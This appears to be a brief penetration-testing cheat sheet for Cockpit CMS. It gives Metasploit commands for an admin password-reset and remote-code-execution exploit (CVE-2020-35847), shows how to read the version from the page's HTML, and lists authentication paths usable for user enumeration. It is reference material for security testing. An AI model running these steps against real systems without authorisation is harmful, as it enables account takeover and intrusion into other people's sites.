Cockpit CMS Pentesting
Last modified: 2023-02-05
Cockpit CMS is a content management system for publishing contents.
Enumeration & Remote Code Execution (RCE) & Reverse Shell
# Reset password (CVE-2020-35847)
msf> use exploit/multi/cockpit_cms_rce
msf> set USER admin
msf> run
Version Detection
Cockpit CMS version is displayed as the value of “data-version” attribute in html tag.
<html lang="en" data-base="/" data-route="/" data-version="0.11.1" data-locale="en">
Common Directories
/auth/check # We can enumerate users using the path
/auth/forgotpassword
/auth/index
/auth/login
/auth/requestreset # We can enumerate users using the path